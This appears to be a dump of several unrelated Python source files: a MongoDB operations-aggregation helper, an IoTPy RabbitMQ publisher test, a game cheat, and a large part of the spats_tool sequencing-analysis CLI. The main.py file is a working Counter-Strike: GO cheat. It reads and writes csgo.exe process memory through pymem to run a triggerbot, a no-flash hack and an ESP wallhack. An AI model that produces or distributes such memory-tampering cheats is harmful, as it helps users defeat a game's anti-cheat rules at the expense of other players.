ppid = pidfile.readline()
except IOError, e:
logging.error(e)
return False
# Instanciating a process to get info about it
proc = Process(int(ppid))
if proc.name() == 'python' and self.arch_spec['archiver_name'] in proc.cmdline():
return True
class SubCmdOperations:
def __init__(self, catalog_sess=None):
self.catalog = catalog_sess
def get_first_and_last_ops_per_coll(self, cluster_name=None):
# Aggregation query to list the first and last operation grouped by database
pipeline = [
{'$sort': {'created_at': 1}},
{'$group': {'_id': {'dbname':'$ns.db', 'collname':'$ns.coll'},
'firstOperation': {'$first': '$created_at'},
'lastOperation': {'$last': '$created_at'}
}
},
{'$sort': {'firstOperation': 1}}
]
aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
return aggr_ops
def get_first_and_last_ops_cluster(self, cluster_name=None):
# Aggregation query to list the first and last operation for the whole cluster
pipeline = [
{'$sort': {'created_at': 1}},
{'$group': {'_id': 'cluster',
'firstOperation': {'$first': '$created_at'},
'lastOperation': {'$last': '$created_at'}
}
},
{'$sort': {'firstOperation': 1}}
]
aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
return aggr_ops
def get_ops_per_type(self, cluster_name=None, from_date=None, until_date=None):
# Aggregation query to list operations per type/database/coll
pipeline = [
{
'$match': {
'$and': [
{'created_at': {'$gte': from_date}},
{'created_at': {'$lte': until_date}}
]
}
},
{
'$group': {
'_id': {'dbname': '$ns.db', 'collname': '$ns.coll', 'op_type': '$operationType'},
'totalOps': {'$sum': 1}
}
},
{
'$project': {
'_id': 0,
'dbname': '$_id.dbname',
'collname': '$_id.collname',
'op_type': '$_id.op_type',
'totalOps': 1
}
},
{
'$group': {
'_id': {'dbname': '$dbname', 'collname': '$collname'},
'per_type': {
'$push': {'op_type': '$op_type', 'totalOps': '$totalOps'}
}
}
},
{'$sort': {'_id': 1, 'per_type.op_type': 1}}
]
aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
return aggr_ops
def get_total_ops_per_collection(self, cluster_name=None, from_date=None, until_date=None):
# Aggregation query to count all operations per database/coll
pipeline = [
{
'$match': {
'created_at': {'$gte': from_date},
'created_at': {'$lte': until_date}
}
},
{
'$group': {
'_id': {'dbname': '$ns.db', 'collname': '$ns.coll', 'op_type': '$operationType'},
'totalOps': {'$sum': 1}
}
},
{
'$group': {
'_id': {'dbname':'$_id.dbname', 'collname': '$_id.collname'},
'totalCollOps': { '$sum': '$totalOps'}
}
}
]
aggr_ops = self.catalog.run_aggregation(coll_name=cluster_name, aggr_pipeline=pipeline)
return aggr_ops
|
pika_publisher_test.py | import time
import threading
import sys
sys.path.append("../")
from IoTPy.core.stream import Stream, run
from IoTPy.concurrency.PikaPublisher import PikaPublisher
# multicore imports
from IoTPy.concurrency.multicore import get_processes_and_procs
from IoTPy.concurrency.multicore import terminate_stream
from IoTPy.concurrency.multicore import extend_stream
def test_pika_publisher(routing_key, exchange, host, data):
# Step 0: Define agent functions, source threads
# and actuator threads (if any).
# Step 0.0: Define agent functions.
# pika_publisher_agent is the agent for the processor
# called 'pika_publisher_process'.
def pika_publisher_agent(in_streams, out_streams):
# publish in_streams[0] for the specified routing key, exchange, host.
PikaPublisher(
routing_key, exchange, host).publish(in_streams[0])
# Step 0.1: Define source thread targets (if any).
def thread_target_source(procs):
for sublist in data:
extend_stream(procs, sublist, stream_name='source')
# Sleep to simulate an external data source.
time.sleep(0.001)
# Put '_finished' on the stream because the stream will not
# be extended. This informs subscriber that stream is finished.
extend_stream(procs, data=['_finished'], stream_name='source')
# Terminate stream because this stream will not be extended.
terminate_stream(procs, stream_name='source')
# Step 1: multicore_specification of streams and processes.
# Specify Streams: list of pairs (stream_name, stream_type).
# Specify Processes: name, agent function,
# lists of inputs and outputs, additional arguments.
multicore_specification = [
# Streams
[('source', 'x')],
# Processes
[{'name': 'pika_publisher_process', 'agent': pika_publisher_agent,
'inputs':['source'], 'sources': ['source']}]]
# Step 2: Create processes.
processes, procs = get_processes_and_procs(multicore_specification)
# Step 3: Create threads (if any)
thread_0 = threading.Thread(target=thread_target_source, args=(procs,))
# Step 4: Specify which process each thread runs in.
# thread_0 runs in the process called 'p1'
procs['pika_publisher_process'].threads = [thread_0]
# Step 5: Start, join and terminate processes.
for process in processes: process.start()
for process in processes: process.join()
for process in processes: process.terminate()
def simple_test():
"""
A simpler test than test_pika_publisher. This simpler
test uses 'run' rather than creating a process and thread.
"""
stream = Stream('stream')
PikaPublisher(
routing_key='temperature',
exchange='publications', host='localhost').publish(stream)
stream.extend(['Please Vote!'])
stream.append('_finished')
#--------------------------------------------
# TESTS
#--------------------------------------------
if __name__ == '__main__':
# Run either the main test or simple_test (but not both).
# This is some arbitrary data merely for testing.
# Each sublist of data is published separately.
data = [[0, 1], ['Hello', 'World'], ['THE', 'END', 'IS', 'NIGH!', '_finished']]
test_pika_publisher(
routing_key='temperature', exchange='publications', host='localhost',
data=data)
#simple_test()
|
main.py | from pystyle import Anime, Center, Colorate, Colors
from pynput.mouse import Button, Controller
import threading, time, pymem, random
class Offset:
def __init__(self):
self.dwEntityList = 0x4DBF75C
self.dwLocalPlayer = 0xDA544C
self.m_iCrosshairId = 0x11838
self.m_iTeamNum = 0xF4
self.m_fFlags = 0x104
self.m_flFlashMaxAlpha = 0x1046C
self.dwGlowObjectManager = 0x5307C48
self.m_iGlowIndex = 0x10488
self.m_dwBoneMatrix = 0x26A8
self.m_vecOrigin = 0x138
class CsFuck:
def __init__(self):
self.trigger_bot = True
self.no_flash = True
self.esp = True
self.mouse = Controller()
self.Offset = Offset()
self.pm = pymem.Pymem("csgo.exe")
self.client = pymem.process.module_from_name(self.pm.process_handle, "client.dll").lpBaseOfDll
def triger_bot_tread(self):
while True:
if self.triger_bot_tread:
time.sleep(0.006)
try:
player = self.pm.read_int(self.client + self.Offset.dwLocalPlayer)
entity_id = self.pm.read_int(player + self.Offset.m_iCrosshairId)
entity = self.pm.read_int(self.client + self.Offset.dwEntityList + (entity_id - 1) * 0x10)
entity_team = self.pm.read_int(entity + self.Offset.m_iTeamNum)
player_team = self.pm.read_int(player + self.Offset.m_iTeamNum)
if entity_id > 0 and entity_id <= 64 and player_team != entity_team:
self.mouse.click(Button.left, 1)
except:
pass
else:
time.sleep(1)
def no_flash_thread(self):
while True:
if self.no_flash:
player = self.pm.read_int(self.client + self.Offset.dwLocalPlayer)
if player:
flash_value = player + self.Offset.m_flFlashMaxAlpha
if flash_value:
self.pm.write_float(flash_value, float(0))
time.sleep(1)
def esp_thread(self):
while True:
if self.esp:
time.sleep(0.006)
glow_manager = self.pm.read_int(self.client + self.Offset.dwGlowObjectManager)
player = self.pm.read_int(self.client + self.Offset.dwLocalPlayer)
player_team = self.pm.read_int(player + self.Offset.m_iTeamNum)
for i in range(1, 64):
try:
entity = self.pm.read_int(self.client + self.Offset.dwEntityList + i * 0x10)
if entity:
entity_glow = self.pm.read_int(entity + self.Offset.m_iGlowIndex)
entity_team = self.pm.read_int(entity + self.Offset.m_iTeamNum)
if player_team != entity_team:
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x8, float(random.randint(0, 1)))
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0xC, float(random.randint(0, 1)))
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x10, float(random.randint(0, 1)))
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x14, float(1))
self.pm.write_int(glow_manager + entity_glow * 0x38 + 0x28, 1)
else:
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x8, float(0))
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0xC, float(1))
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x10, float(0))
self.pm.write_float(glow_manager + entity_glow * 0x38 + 0x14, float(1))
self.pm.write_int(glow_manager + entity_glow * 0x38 + 0x28, 1)
except:
pass
else:
time.sleep(1)
def run(self):
threading.Thread(target= self.no_flash_thread).start()
threading.Thread(target= self.triger_bot_tread).start()
threading.Thread(target= self.esp_thread).start()
banner = '''
____ _____ _
/ ___|___ _ _| ___| _ ___| | __
| | / __(_|_) |_ | | | |/ __| |/ /
| |___\__ \_ _| _|| |_| | (__| <
\____|___(_|_)_| \__,_|\___|_|\_\\
'''
Anime.Fade(Center.Center(banner), Colors.blue_to_purple, Colorate.Vertical, interval=1)
CsFuck().run() |
tool.py |
import ast
from configparser import ConfigParser, SafeConfigParser
import csv
import datetime
import json
import multiprocessing
import os
import shutil
import subprocess
import sys
import time
from shutil import copyfile
import re
import ntpath
import spats_shape_seq
from spats_shape_seq import Spats
from spats_shape_seq.parse import abif_parse, fastq_handle_filter, FastFastqParser
from spats_shape_seq.reads import ReadsData, ReadsAnalyzer
from spats_shape_seq.counters import Counters
from spats_shape_seq.util import objdict_to_dict
from spats_shape_seq.mask import PLUS_PLACEHOLDER, MINUS_PLACEHOLDER
class SpatsTool(object):
def __init__(self, path):
self.path = path or os.getcwd()
self.config = None
self.cotrans = False
self._skip_log = False
self._no_config_required_commands = [ "doc", "help", "init", "viz", "show", "extract_case", "add_case", "show_test_case" ]
self._private_commands = [ "viz", "to_shapeware", "rerun" ]
self._temp_files = []
self._r1 = None
self._r2 = None
self._r1_plus = None
self._r2_plus = None
self._r1_minus = None
self._r2_minus = None
self._parse_config()
def _parse_config(self):
config_path = os.path.join(self.path, "spats.config")
if not os.path.exists(config_path):
return
parser = SafeConfigParser()
parser.read(config_path)
config = {}
for section in parser.sections():
if section not in config:
config[section] = {}
for name, value in parser.items(section):
config[section][name] = value
if config and 'spats' in config:
self.config = config['spats']
if 'cotrans' in self.config:
cotrans = self.config['cotrans']
self.cotrans = bool(ast.literal_eval(cotrans))
self.metadata = config.get('metadata', {})
def _module_path(self):
return os.path.dirname(spats_shape_seq.__file__)
def _spats_path(self):
return os.path.normpath(os.path.join(self._module_path(), ".."))
def _native_tool(self, tool_name):
bin_path = os.path.join(self._spats_path(), "native", "bin", tool_name)
return bin_path if os.path.exists(bin_path) else None
def _add_note(self, note):
self._notes.append(note)
print(":{}".format(note))
def _load_r1_r2(self, suffix = ''):
def decomp(rx):
base, ext = os.path.splitext(os.path.basename(rx))
if ext.lower() == '.gz':
self._add_note("decompressing {}".format(rx))
out = os.path.join(self.path, base + ".tmp")
subprocess.check_call('gzip -d -c "{}" > "{}"'.format(rx, out), cwd = self.path, shell = True)
self._temp_files.append(out)
self._sentinel("decompress {}".format(rx))
return out
return rx
def singleOrList(rkey):
# hack to keep r1_plus and r2_plus properties backwards compatible...
res = [ decomp(r.strip()) for r in self.config[rkey].split(',') ]
return res if len(res) > 1 else res[0]
return singleOrList('r1' + suffix), singleOrList('r2' + suffix)
@property
def r1(self):
if not self._r1:
self._r1, self._r2 = self._load_r1_r2()
return self._r1
@property
def r2(self):
if not self._r2:
self._r1, self._r2 = self._load_r1_r2()
return self._r2
@property
def using_separate_channel_files(self):
return bool(self.config.get('r1_plus'))
@property
def r1_plus(self):
if not self._r1_plus:
self._r1_plus, self._r2_plus = self._load_r1_r2('_plus')
return self._r1_plus
@property
def r2_plus(self):
if not self._r2_plus:
self._r1_plus, self._r2_plus = self._load_r1_r2('_plus')
return self._r2_plus
@property
def plus_channels(self):
r1p, r2p = self.r1_plus, self.r2_plus
if not isinstance(r1p, list):
r1p = [ r1p ]
if not isinstance(r2p, list):
r2p = [ r2p ]
if len(r1p) != len(r2p):
raise Exception("r1/r2 plus channels do not correspond")
return zip(r1p, r2p)
@property
def r1_minus(self):
if not self._r1_minus:
self._r1_minus, self._r2_minus = self._load_r1_r2('_minus')
return self._r1_minus
@property
def r2_minus(self):
if not self._r2_minus:
self._r1_minus, self._r2_minus = self._load_r1_r2('_minus')
return self._r2_minus
def _run(self, args):
if not args:
print("Command required. Try 'spats_tool help'.")
return
command = args[0]
self._command_args = args[1:]
if not self.config and command not in self._no_config_required_commands:
print("Missing spats.config")
return
self._notes = []
self.start = time.time()
hdlr = getattr(self, command, None)
if not hdlr:
print("Invalid command: {}".format(command))
return
try:
hdlr()
failure = False
except Exception as e:
print("** Command {} failed. ({})".format(command, e))
failure = True
#raise
if not failure and not self._skip_log:
delta = self._sentinel("{} complete".format(command))
self._log(command, delta)
for f in self._temp_files:
if os.path.exists(f):
os.remove(f)
def _sentinel(self, label):
delta = time.time() - self.start
self._add_note("{} @ {:.2f}s".format(label, delta))
return delta
def _log(self, command, delta):
stamp = datetime.datetime.now().strftime('%Y/%m/%d %H:%M')
with open(os.path.join(self.path, 'spats.log'), 'at') as outfile:
outfile.write("{} : {}, {:.2f}s\n".format(stamp, command, delta))
for note in self._notes:
outfile.write(" - {}\n".format(note))
outfile.write("\n")
def init(self):
"""Set up a spats_tool folder.
"""
self._skip_log = True
config_path = os.path.join(self.path, "spats.config")
if not os.path.exists(config_path):
open(config_path, 'wt').write(_spats_config_template)
self._add_note("Created default spats.config, please edit before running tools.")
else:
self._add_note("** spats.config already exists, not overwriting!")
def reads(self):
"""Perform reads analysis on the r1/r2 fragment pairs, for use with the visualization tool.
"""
db_name = self._reads_file()
if os.path.exists(db_name):
self._add_note("** removing previous reads file")
os.remove(db_name)
native_tool = self._native_tool('reads')
if native_tool:
self._add_note("using native reads")
subprocess.check_call([native_tool, self.config['target'], self.r1, self.r2, db_name], cwd = self.path)
data = ReadsData(db_name)
if not native_tool:
self._add_note("using python reads")
if self.using_separate_channel_files:
pcs = self.plus_channels
if len(pcs) > 1:
raise Exception("multiple positive r1 channel files not supported for reads tool.")
data.parse(self.config['target'], [pcs[0][0], self.r1_minus], [pcs[0][1], self.r2_minus])
else:
data.parse(self.config['target'], [self.r1], [self.r2])
analyzer = ReadsAnalyzer(data, cotrans = self.cotrans)
self._update_run_config(analyzer.run)
# xref https://trello.com/c/VMFyZjjg/286-handle-quality-parsing-in-reads-tool-if-configured
# to do this, we'd need to parse quality to the db (nontrivial)
# for now just force-disable this, as it's not required to do reads analysis
analyzer.run.mutations_require_quality_score = None
analyzer.process_tags()
self._add_note("tags processed to {}".format(os.path.basename(db_name)))
def rerun(self):
""" Re-does reads analysis for pairs that have a tag into a new result set to allow comparing results across config options.
"""
if not self._command_args or len(self._command_args) != 4:
raise Exception("usage: spats_tool rerun tag spats_run result_set_name cmp_set_name\n\t- tag indicating the pairs to rerun\n\t- path to a spats database file\n\t- name for the new result set\n\t- name of result set to compare against.")
tag = self._command_args[0]
spatsdb = self._command_args[1]
result_set_name = self._command_args[2]
cmp_set_name = self._command_args[3]
if not os.path.exists(spatsdb):
raise Exception("spats_run file does not exist at path {}".format(spatsdb))
native_tool = self._native_tool('reads')
if native_tool:
self._add_note("using native reads")
subprocess.check_call([native_tool, self.config['target'], self.r1, self.r2, db_name], cwd = self.path)
data = ReadsData(spatsdb)
if data.pair_db.result_set_id_for_name(result_set_name):
raise Exception("result_set_name '{}' already exists in spats db".format(result_set_name))
cmp_set_id = data.pair_db.result_set_id_for_name(cmp_set_name)
if not cmp_set_id:
raise Exception("cmp_set_name '{}' does not exist in spats db".format(cmp_set_name))
if not native_tool:
self._add_note("using python reads")
if self.using_separate_channel_files:
raise Exception('rerun tool not supported with separate channel files')
analyzer = ReadsAnalyzer(data, cotrans = self.cotrans)
data.pair_db.load_run(analyzer.run)
self._update_run_config(analyzer.run)
analyzer.run._redo_tag = tag
analyzer.run.result_set_name = result_set_name
analyzer.run.cmp_set_id = cmp_set_id
# xref https://trello.com/c/VMFyZjjg/286-handle-quality-parsing-in-reads-tool-if-configured
# to do this, we'd need to parse quality to the db (nontrivial)
# for now just force-disable this, as it's not required to do reads analysis
analyzer.run.mutations_require_quality_score = None
redo_tags = data.pair_db.tag_counts(cmp_set_id, [ tag ])
self._add_note("rerunning {} pairs (incl. multiples) with tag '{}'...".format(redo_tags[tag], tag))
analyzer.process_tags()
self._add_note("tags processed to {}".format(os.path.basename(spatsdb)))
num_done = data.pair_db.num_results(result_set_name)
diff_failures = 0
new_failures = 0
fixed_failures = 0
diff_sites = 0
diff_ends = 0
for res in data.pair_db.differing_results(result_set_name, cmp_set_name):
assert(res[13] == res[14])
multiplicity = min(int(res[13]), int(res[14]))
if res[7] != res[12]:
diff_failures += multiplicity
if res[7] and not res[12]:
new_failures += multiplicity
elif res[12] and not res[7]:
fixed_failures += multiplicity
else:
if res[5] != res[10]:
diff_sites += multiplicity
if res[4] != res[9]:
diff_ends += multiplicity
print("New result set '{}' for tagged pairs added to {}.".format(result_set_name, spatsdb))
print("Quick comparison of {} unique tagged pairs with result_set '{}' yielded: ".format(num_done, cmp_set_name))
print("\t- {} pairs with different failures".format(diff_failures))
print("\t - {} failures were fixed".format(fixed_failures))
print("\t - {} failures were new".format(new_failures))
print("\t- {} pairs with different sites".format(diff_sites))
print("\t- {} pairs with different ends".format(diff_ends))
def pre(self):
"""Process the pre-sequence data file.
"""
if 'preseq' not in self.config:
raise Exception("Missing 'preseq' file in spats.config")
pre_files = [ f.strip() for f in self.config['preseq'].split(',') ]
for filename in pre_files:
key, _ = os.path.splitext(os.path.basename(filename))
pre_name = self._pre_file(key)
if os.path.exists(pre_name):
self._add_note("** removing previous preseq file")
os.remove(pre_name)
preseq_data = abif_parse(filename, fields = [ 'DATA2', 'DATA3', 'DATA105' ])
open(pre_name, 'wt').write(json.dumps(preseq_data))
self._add_note("pre-sequencing data processed to {}".format(os.path.basename(pre_name)))
nb = self._notebook()
if nb:
nb.add_preseq(key).save()
def _run_plots(self):
nb = self._notebook()
if nb:
nb.add_spats_run(self.cotrans, True).save()
def run(self):
"""Process the SPATS data for the configured target(s) and r1/r2 fragment pairs.
"""
run_name = self._run_file()
if os.path.exists(run_name):
self._add_note("** removing previous run file")
os.remove(run_name)
native_tool = self._native_tool('cotrans')
if native_tool and not self.cotrans:
self._add_note("skipping native tool due to non-cotrans run")
native_tool = None
spats = Spats(cotrans = self.cotrans)
if self._update_run_config(spats.run) and native_tool:
self._add_note("skipping native tool due to custom config")
native_tool = None
if native_tool:
self._add_note("using native cotrans processor")
subprocess.check_call([native_tool, self.config['target'], self.r1, self.r2, run_name], cwd = self.path)
else:
self._add_note("using python processor")
spats.addTargets(self.config['target'])
if self.using_separate_channel_files:
self._add_note("using separate channel files.")
self._add_note("processing minus/untreated pairs")
spats.process_pair_data(self.r1_minus, self.r2_minus, force_mask = (spats.run.masks[1] if spats.run.masks[1] else MINUS_PLACEHOLDER))
pcs = self.plus_channels
if len(pcs) == 1:
self._add_note("processing plus/treated pairs")
spats.process_pair_data(pcs[0][0], pcs[0][1], force_mask = (spats.run.masks[0] if spats.run.masks[0] else PLUS_PLACEHOLDER))
spats.store(run_name)
else:
if len(spats.run.masks) >= 2 and (not spats.run.masks[0] or not spats.run.masks[1]):
raise Exception("empty masks with split channels not supported for reads tool.")
spats.store(run_name)
for i, (r1_plus, r2_plus) in enumerate(pcs):
self._add_note("processing plus/treated pairs, set #{}".format(i + 1))
spats._processor.counters.reset()
spats.process_pair_data(r1_plus, r2_plus, force_mask = (spats.run.masks[0] if spats.run.masks[0] else PLUS_PLACEHOLDER))
spats.store(run_name + ".p{}".format(i + 1))
else:
spats.process_pair_data(self.r1, self.r2)
spats.store(run_name)
self._add_note("wrote output to {}".format(os.path.basename(run_name)))
nb = self._notebook()
if nb:
nb.add_spats_run(self.cotrans, spats.run.count_mutations).save()
def _update_run_config(self, run, dictionary = None):
custom_config = False
sentinel = '_-=*< sEnTiNeL >*-=_'
for key, value in iter(self.config.items()):
if key in [ "r1", "r2", "r1_plus", "r2_plus", "r1_minus", "r2_minus", "preseq", "target", "cotrans" ]:
continue
if sentinel != getattr(run, key, sentinel):
try:
val = ast.literal_eval(value)
except:
val = value
#print("overwriting with", key, val)
setattr(run, key, val)
self._add_note("config set {} = {}".format(key, val))
if dictionary:
dictionary[key] = val
custom_config = True
else:
self._add_note("warning: unknown config {}".format(key))
return custom_config
def _spats_file(self, base_name):
return os.path.join(self.path, '{}.spats'.format(base_name))
def _pre_file(self, key):
return self._spats_file('pre_{}'.format(key))
def _run_file(self):
return self._spats_file('run')
def _reads_file(self):
return self._spats_file('reads')
def _notebook(self):
try:
import spats_shape_seq.nbutil as nbutil
except:
return None
nb = nbutil.Notebook(os.path.join(self.path, 'spats.ipynb'))
if nb.is_empty():
nb.add_metadata(self.metadata)
nb.add_initializer()
return nb
def validate(self):
"""Validate the results of a previous 'process' run against a second (slower) algorithm.
"""
run_name = self._run_file()
if not os.path.exists(run_name):
raise Exception("Run must be performed before validating")
spats = Spats()
spats.load(run_name)
if spats.validate_results(self.r1, self.r2):
self._add_note("Validation pass")
else:
self._add_note("Validation FAILURE")
def _install_nbextensions(self):
ext_out = subprocess.check_output(["jupyter", "nbextension", "list", "--user"])
if "spats_shape_seq/main" not in ext_out:
subprocess.check_call(["jupyter", "nbextension", "install", "--user", "--py", "spats_shape_seq"])
subprocess.check_call(["jupyter", "nbextension", "enable", "--user", "--py", "spats_shape_seq"])
def _install_jupyter_browser_fix(self):
jup_conf_path = os.path.expanduser('~/.jupyter/jupyter_notebook_config.py')
jup_conf_line = "c.NotebookApp.browser = u'open %s'\n"
if os.path.exists(jup_conf_path):
jup_conf = open(jup_conf_path, 'rt').read()
if 'c.NotebookApp.browser' in jup_conf:
return
jup_conf += "\n" + jup_conf_line
else:
jup_conf = jup_conf_line
open(jup_conf_path, 'wt').write(jup_conf)
def _install_matplotlib_styles(self):
import matplotlib as mpl
conf_dir = mpl.get_configdir()
if not os.path.exists(conf_dir):
os.mkdir(conf_dir)
style_dir = os.path.join(conf_dir, 'stylelib')
if not os.path.exists(style_dir):
os.mkdir(style_dir)
static_path = os.path.join(self._module_path(), 'static', 'styles')
for style in os.listdir(static_path):
target_path = os.path.join(style_dir, style)
if not os.path.exists(target_path):
shutil.copyfile(os.path.join(static_path, style), target_path)
def nb(self):
"""Launch the Jupyter notebook.
"""
self._skip_log = True
if not self._notebook():
raise Exception('Notebook requires the jupyter and nbformat pacakges. Try "pip install nbformat jupyter".')
self._install_nbextensions()
self._install_matplotlib_styles()
self._install_jupyter_browser_fix()
try:
process = subprocess.Popen(["jupyter", "notebook", "-y", "spats.ipynb"], cwd = self.path)
process.wait()
except KeyboardInterrupt:
process.terminate()
time.sleep(0.4)
process.wait()
def viz(self):
"""Launch the visualization tool UI.
"""
self._skip_log = True
if sys.platform != "darwin":
raise Exception("Invalid platform for viz UI: {}".format(sys.platform))
subprocess.check_call(["make", "vizprep"], cwd = self._spats_path())
def viz_handler():
from viz.ui import SpatsViz
sv = SpatsViz()
sv.stop_on_disconnect = True
sv.start()
sv.waitFor()
def uiclient_handler():
bin_path = os.path.join(self._spats_path(), "bin", "UIClient.app", "Contents", "MacOS", "UIClient")
try:
subprocess.call([bin_path], cwd = self._spats_path())
except KeyboardInterrupt:
pass
viz_worker = multiprocessing.Process(target = viz_handler, args = [])
viz_worker.start()
uiclient_worker = multiprocessing.Process(target = uiclient_handler, args = [])
time.sleep(0.1)
uiclient_worker.start()
try:
while viz_worker.is_alive() and uiclient_worker.is_alive():
viz_worker.join(0.1)
uiclient_worker.join(0.1)
except KeyboardInterrupt:
pass
if viz_worker.is_alive():
viz_worker.join()
if uiclient_worker.is_alive():
uiclient_worker.terminate()
def dump(self):
"""Dump data. Provide 'reads', 'run', 'prefixes', 'mut_counts' or 'indel_lens'
as an argument to dump the indicated type of data.
"""
self._skip_log = True
if not self._command_args:
raise Exception("Dump requires a type ('reads', 'run', 'prefixes', 'mut_counts' or 'indel_lens').")
dump_type = self._command_args[0]
handler = getattr(self, "_dump_" + dump_type, None)
if not handler:
raise Exception("Invalid dump type: {}".format(dump_type))
if dump_type == 'reads':
self._dump_reads()
else:
self._dump_wrapper(handler)
def _dump_reads(self):
reads_name = self._reads_file()
if not os.path.exists(reads_name):
raise Exception("Reads must be run before attempting dump")
data = ReadsData(reads_name)
db = data.pair_db
counts = db.tag_counts(1)
total = float(db.count()) / 100.0 # because of this, cannot dump "rerun" data
keys = sorted(counts.keys(), key = lambda x : counts[x], reverse = True)
data = [ [ key, float(counts[key])/total, counts[key] ] for key in keys ]
output_path = os.path.join(self.path, 'reads.csv')
self._write_csv(output_path, [ "Tag", "Percentage", "Count" ], data)
def _dump_wrapper(self, handler):
run_name = self._run_file()
if not os.path.exists(run_name):
raise Exception("Run must be run before attempting dump")
partial = False
base_file = ntpath.basename(run_name)
for filep in os.listdir(self.path):
rn = re.match("^{}\.p(\d+)$".format(base_file), filep)
if rn:
spats = Spats()
spats.load(run_name)
spats.merge(filep)
handler(spats, "p{}_".format(rn.group(1)))
partial = True
if not partial:
spats = Spats()
spats.load(run_name)
handler(spats)
def _dump_prefixes(self, spats, fprefix = ""):
countinfo = spats.counters.counts_dict()
total = float(countinfo['total_pairs']) / 100.0
for mask in spats.run.masks:
prefixes = []
keyprefix = "prefix_{}_".format(mask)
for key in sorted([k for k in countinfo.keys() if k.startswith(keyprefix)], key = lambda k : countinfo[k], reverse = True):
prefixes.append((key[len(keyprefix):], float(countinfo[key]) / total, countinfo[key]))
output_path = os.path.join(self.path, '{}prefixes_{}.csv'.format(fprefix, mask))
self._write_csv(output_path, [ "Tag", "Percentage", "Count" ], prefixes)
total = float(countinfo['registered_pairs']) / 100.0
for mask in spats.run.masks:
prefixes = []
keyprefix = "mapped_prefix_{}_".format(mask)
for key in sorted([k for k in countinfo.keys() if k.startswith(keyprefix)], key = lambda k : countinfo[k], reverse = True):
prefixes.append((key[len(keyprefix):], float(countinfo[key]) / total, countinfo[key]))
output_path = os.path.join(self.path, '{}mapped_prefixes_{}.csv'.format(fprefix, mask))
self._write_csv(output_path, [ "Tag", "Percentage", "Count" ], prefixes)
def _dump_mut_counts(self, spats, prefix = ""):
countinfo = spats.counters.counts_dict()
mut_cnts = []
for muts in sorted([int(k.split('_')[-1]) for k in countinfo.keys() if k.startswith('mut_count_')]):
mut_cnts.append((muts, countinfo["mut_count_{}".format(muts)]))
output_path = os.path.join(self.path, '{}mut_counts.csv'.format(prefix))
self._write_csv(output_path, [ "Mutation Count", "Reads" ], mut_cnts)
mut_cnts = []
for muts in sorted([int(k.split('_')[-1]) for k in countinfo.keys() if k.startswith('mapped_mut_count_')]):
mut_cnts.append((muts, countinfo["mapped_mut_count_{}".format(muts)]))
output_path = os.path.join(self.path, '{}mapped_mut_counts.csv'.format(prefix))
self._write_csv(output_path, [ "Mutation Count", "Reads" ], mut_cnts)
def _dump_indel_lens(self, spats, prefix = ""):
countinfo = spats.counters.counts_dict()
ilen_cnt = []
for lc in sorted([int(k.split('_')[-1]) for k in countinfo.keys() if k.startswith('mapped_indel_len_')]):
ilen_cnt.append((lc, countinfo["mapped_indel_len_{}".format(lc)]))
output_path = os.path.join(self.path, '{}mapped_indel_len_counts.csv'.format(prefix))
self._write_csv(output_path, [ "Indel Length", "Reads" ], ilen_cnt)
def _dump_run(self, spats, prefix = ""):
profiles = spats.compute_profiles()
mutations = spats.run.count_mutations
indels = spats.run.handle_indels
zees = spats.run.compute_z_reactivity
headers = [ "L", "site", "nt", "f+", "f-" ]
if indels:
headers += [ "ins+", "ins-", "del+", "del-" ]
if mutations:
headers += [ "mut+", "mut-", "beta", "mu", "r" ]
else:
headers += [ "beta", "theta", "rho" ]
if zees:
headers += [ "z" ]
headers += [ "c thresh", "c" ]
data = []
sites_missing_reads = []
if self.cotrans:
tgt = spats.targets.targets[0]
tseq = tgt.seq
for key in profiles.cotrans_keys():
end = int(key.split('_')[-1])
prof = profiles.profilesForTargetAndEnd(tgt.name, end)
for i in range(end + 1):
if 0 == prof.treated[i] and 0 == prof.untreated[i]:
sites_missing_reads.append( (tgt, end, i) )
datapt = [ end, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
if indels:
datapt += [ prof.treated_inserts[i], prof.untreated_inserts[i], prof.treated_deletes[i], prof.untreated_deletes[i] ]
if mutations:
datapt += [ prof.treated_muts[i], prof.untreated_muts[i], prof.beta[i], prof.mu[i], prof.r_mut[i] ]
else:
datapt += [ prof.beta[i], prof.theta[i], prof.rho[i] ]
if zees:
datapt += [ prof.z[i] ]
datapt += [ prof.c_thresh, prof.c ]
data.append(datapt)
output_path = os.path.join(self.path, '{}{}.csv'.format(prefix, tgt.name))
self._write_csv(output_path, headers, data)
empty_cell = ''
keys = [ 'treated', 'untreated' ]
if indels:
keys += [ 'treated_inserts', 'untreated_inserts', 'treated_deletes', 'untreated_deletes' ]
if mutations:
keys += [ 'treated_mut', 'untreated_mut', 'beta', 'mu', 'r' ]
else:
keys += [ 'beta', 'theta', 'rho' ]
if zees:
keys += [ 'z' ]
cotrans_keys = profiles.cotrans_keys()
for key in keys:
ncols = 0
mat = []
for pkey in cotrans_keys:
end = int(pkey.split('_')[-1])
prof = profiles.profilesForTargetAndEnd(tgt.name, end)
vals = getattr(prof, key)
if not ncols:
ncols = len(cotrans_keys) + len(vals)
if len(vals) < ncols:
vals += ([empty_cell] * (ncols - len(vals)))
mat.append(vals)
self._write_csv('{}{}_{}_mat.csv'.format(prefix, tgt.name, key), None, mat)
else:
for tgt in spats.targets.targets:
tseq = tgt.seq
end = len(tgt.seq)
prof = profiles.profilesForTarget(tgt)
data = []
for i in range(end + 1):
if 0 == prof.treated[i] and 0 == prof.untreated[i]:
sites_missing_reads.append( (tgt, end, i) )
datapt = [ end, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
if indels:
datapt += [ prof.treated_inserts[i], prof.untreated_inserts[i], prof.treated_deletes[i], prof.untreated_deletes[i] ]
if mutations:
datapt += [ prof.treated_muts[i], prof.untreated_muts[i], prof.beta[i], prof.mu[i], prof.r_mut[i] ]
else:
datapt += [ prof.beta[i], prof.theta[i], prof.rho[i] ]
if zees:
datapt += [ prof.z[i] ]
datapt += [ prof.c_thresh, prof.c ]
